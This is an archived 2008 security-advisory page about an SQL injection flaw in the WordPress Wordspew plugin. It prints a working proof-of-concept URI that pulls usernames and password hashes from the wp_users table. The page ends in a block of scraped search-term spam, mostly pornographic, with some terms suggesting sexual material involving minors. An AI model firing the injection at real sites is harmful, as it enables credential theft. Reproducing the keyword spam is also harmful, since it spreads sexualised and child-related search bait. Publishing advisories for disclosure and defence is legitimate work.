about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WordPress Plugin Wordspew SQL Injection Vulnerability


Title WordPress Plugin Wordspew SQL Injection Vulnerability
Published 2008-02-04-12:00AM
Updated 2008-02-04-09:17PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  S@BUN discovered this vulnerability.
Vulnerable  Wordspew Wordspew 0
Not Vulnerable  
Code  An attacker can exploit this issue via a browser.The following proof-of-concept URI is available:http://www.example.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 19:36:26 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
gay on gir Sexeyphoto 200 /compo s e x f i sexmct.tv Bat-men XXNX.COM Sexy.Vedo. Sexeyphoto sex lolyta pureFTP t937t www.hq35.c Mom in tra fifa06 Sexy.Vedo. ehra madri www.khabou sexmct.tv psycho mambo Remo lo372l +phpMyAgen Kerala sex kuwaiti se www.89.... www.89.... Sexy picte Hindi/vide t993t cobalt 4.2 Guest.html xvideos .c www.immatt W w w saxy free-teenp kuwaiti se Www.Videos little gir WWW.NARUTO girlsexpho www.lankax www.xvedio t53t mambo Remo Kushboo se funformobi all cartoo putas+encu xxx paki g